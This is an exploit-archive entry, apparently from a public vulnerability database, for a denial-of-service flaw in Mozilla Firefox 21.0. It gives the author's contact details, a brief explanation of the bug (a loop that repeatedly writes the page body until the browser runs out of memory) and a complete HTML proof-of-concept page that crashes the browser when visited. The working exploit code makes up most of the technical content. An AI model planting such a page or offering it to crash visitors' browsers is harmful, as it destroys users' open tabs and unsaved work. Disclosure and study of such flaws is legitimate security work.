Mozilla Firefox 21.0 Denial Of Service



EKU-ID: 3314 CVE: OSVDB-ID:
Author: Jigsaw Published: 2013-06-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service 
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 22-06-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco 
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service ( all tabs are no longer accessible, your work might be lost)
Tested on : Mozilla Firefox 21.0 the latest release
OS : Tested on Windows 7/ Windows XP     
Risk : Low[+] / Medium[-]


===========================================================================================
#Vulnerability:

This bug is a typical result of endless dialog loop.
The flaw exists when the attacker put document.write(document.body.innerHTML)
in multitudinous loop that make the browser Unable to handle this exception and fall in Out of Memory.
User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.

============================================================================================
#Proof of Concept:

<html>
<body>
<script>
document.write("")
</script>
</body>
<script>
var i=0;
for (i=0;i<=99;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>
</html>
================================================================================================